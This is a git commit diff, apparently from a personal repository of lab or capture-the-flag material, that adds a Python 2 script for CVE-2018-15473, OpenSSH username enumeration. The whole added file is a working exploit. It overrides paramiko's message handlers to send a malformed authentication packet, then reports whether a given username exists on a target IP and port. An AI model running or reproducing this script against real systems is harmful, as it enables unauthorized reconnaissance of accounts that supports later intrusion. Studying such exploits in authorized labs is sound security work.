diff options
| author | Raghuram Subramani <raghus2247@gmail.com> | 2022-03-01 14:47:08 +0530 | 
|---|---|---|
| committer | Raghuram Subramani <raghus2247@gmail.com> | 2022-03-01 14:47:08 +0530 | 
| commit | 71dd1dc672fb230428ed3662f59b552eac70d215 (patch) | |
| tree | cc5da85a62f9b01528cf9570f8e5cc8bd671e9e5 /internal/45939.py | |
| parent | 248b6067cd7522ea0b4eed4b9ed848707a0a2496 (diff) | |
add rooms
Diffstat (limited to 'internal/45939.py')
| -rw-r--r-- | internal/45939.py | 65 | 
1 files changed, 65 insertions, 0 deletions
| diff --git a/internal/45939.py b/internal/45939.py new file mode 100644 index 0000000..76298e3 --- /dev/null +++ b/internal/45939.py @@ -0,0 +1,65 @@ +#!/usr/bin/env python2 +# CVE-2018-15473 SSH User Enumeration by Leap Security (@LeapSecurity) https://leapsecurity.io +# Credits: Matthew Daley, Justin Gardner, Lee David Painter + +import argparse, logging, paramiko, socket, sys, os + +class InvalidUsername(Exception): +    pass + +# malicious function to malform packet +def add_boolean(*args, **kwargs): +    pass + +# function that'll be overwritten to malform the packet +old_service_accept = paramiko.auth_handler.AuthHandler._client_handler_table[ +        paramiko.common.MSG_SERVICE_ACCEPT] + +# malicious function to overwrite MSG_SERVICE_ACCEPT handler +def service_accept(*args, **kwargs): +    paramiko.message.Message.add_boolean = add_boolean +    return old_service_accept(*args, **kwargs) + +# call when username was invalid +def invalid_username(*args, **kwargs): +    raise InvalidUsername() + +# assign functions to respective handlers +paramiko.auth_handler.AuthHandler._client_handler_table[paramiko.common.MSG_SERVICE_ACCEPT] = service_accept +paramiko.auth_handler.AuthHandler._client_handler_table[paramiko.common.MSG_USERAUTH_FAILURE] = invalid_username + +# perform authentication with malicious packet and username +def check_user(username): +    sock = socket.socket() +    sock.connect((args.target, args.port)) +    transport = paramiko.transport.Transport(sock) + +    try: +        transport.start_client() +    except paramiko.ssh_exception.SSHException: +        print '[!] Failed to negotiate SSH transport' +        sys.exit(2) + +    try: +        transport.auth_publickey(username, paramiko.RSAKey.generate(2048)) +    except InvalidUsername: +        print "[-] {} is an invalid username".format(username) +        sys.exit(3) +    except paramiko.ssh_exception.AuthenticationException: +        print "[+] {} is a valid username".format(username) + +# remove paramiko logging +logging.getLogger('paramiko.transport').addHandler(logging.NullHandler()) + +parser = argparse.ArgumentParser(description='SSH User Enumeration by Leap Security (@LeapSecurity)') +parser.add_argument('target', help="IP address of the target system") +parser.add_argument('-p', '--port', default=22, help="Set port of SSH service") +parser.add_argument('username', help="Username to check for validity.") + +if len(sys.argv) == 1: +    parser.print_help() +    sys.exit(1) + +args = parser.parse_args() + +check_user(args.username) | 
